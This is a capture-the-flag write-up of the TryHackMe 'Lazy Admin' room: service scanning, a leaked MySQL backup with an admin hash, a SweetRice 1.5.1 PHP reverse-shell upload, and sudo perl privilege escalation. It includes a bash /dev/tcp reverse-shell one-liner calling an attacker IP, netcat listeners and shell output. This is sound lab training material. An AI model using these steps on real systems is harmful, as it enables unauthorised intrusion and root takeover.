Lazy Admin
Room Covers:
Service Discovery
Finding Vulnerabilities
Exploitation
Privilege Escalation
Target Details
IP: 10.10.209.190
Service Discovery
Using nmap
nmap -sV -sC -Pn -oN nmap.txt 10.10.209.190Services Discovered
ServicePortVersionSSH
22
OpenSSH 7.2p2
HTTP
80
Apache httpd 2.4.18
Finding Directories on HTTP server using GoBuster
gobuster dir -u http://10.10.209.190/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -t 40 --no-error -o web-dirs.txtDirectories Discovered:
/contentOn visiting /content page, the server's using Basic CMS with Sweet Rice installed
Finding Vulnerabilities
From 1st vulnerability, after visting
/content/inc/mysql_backup/link we get SQL database file, from where we get username and password hash, which can be easily cracked online using various tools such as crackstationusernamepassword hashpasswordmanager
42f749ade7f9e195bf475f37a44cafcb
Passwordxxx
we don't know login page yet!
Moving to parent directory
/content/inc/, we get access to all the files , from where we get Sweet Rice version/content/inc/lastest.txtwhich is 1.5.1On Searching for
Sweet Rice 1.5.1 vulnerabilitieson Search Engine, it leads to File UploadOn reading the exploit, we get the admin page link as
/asbut admin page is different which is/content/asVisit
/content/aswith the admin credentials aboveWe can add custom php code from ADS tab
TL;DR;
ServiceVulnerability
Exploitation
Create an evil reverse shell adversitement
Using PentestMonkey php reverse shell template, we can get access to shell, by chaning
ipvariable to our attacker's vpn ip, and then uploadStart listener using netcat
nc -nlvp 1234From
content/inc/ads/we can execute the uploaded reverse shellWe have access to the shell
listening on [any] 1234 ... connect to [10.x.x.x] from (UNKNOWN) [10.10.209.190] 40312 Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux 11:43:09 up 1:26, 0 users, load average: 0.83, 0.30, 0.10 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ sudo -l Matching Defaults entries for www-data on THM-Chal: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User www-data may run the following commands on THM-Chal: (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.plWe can run perl and /home/itguy/backup.pl as root
Privilege Escalation
Finding Escalation Vectors
listening on [any] 1234 ... connect to [10.x.x.x] from (UNKNOWN) [10.10.209.190] 40312 Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux 11:43:09 up 1:26, 0 users, load average: 0.83, 0.30, 0.10 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ sudo -l Matching Defaults entries for www-data on THM-Chal: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User www-data may run the following commands on THM-Chal: (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.plWe can run perl and /home/itguy/backup.pl as root
Victim's shell
# overwrite contents of copy.sh with reverse shell on port echo "/bin/bash -c 'exec bash -i &>/dev/tcp/[ATTACKER_VPN_IP]/4444 <&1'" > /etc/copy.sh # on attacker's machine start netcat listener session on port 4444 # nc -nlvp 4444 # execute reverse shell with sudo rights sudo /usr/bin/perl /home/itguy/backup.plRoot Shell on Attacker's machine
nc -nlvp 4444 listening on [any] 4444 ... connect to [10.x.x.x] from (UNKNOWN) [10.10.209.190] 52812 bash: cannot set terminal process group (1058): Inappropriate ioctl for device bash: no job control in this shell root@THM-Chal:/#
Get Flags
User Flag
cat /home/itguy/user.txt # THM{63e5bce9271952xxxxxxxxxxxxxxxxxx}Root Flag
cat /root/root.txt # THM{6637f41d0177bxxxxxxxxxxxxxxxxxxx}
Last updated
Was this helpful?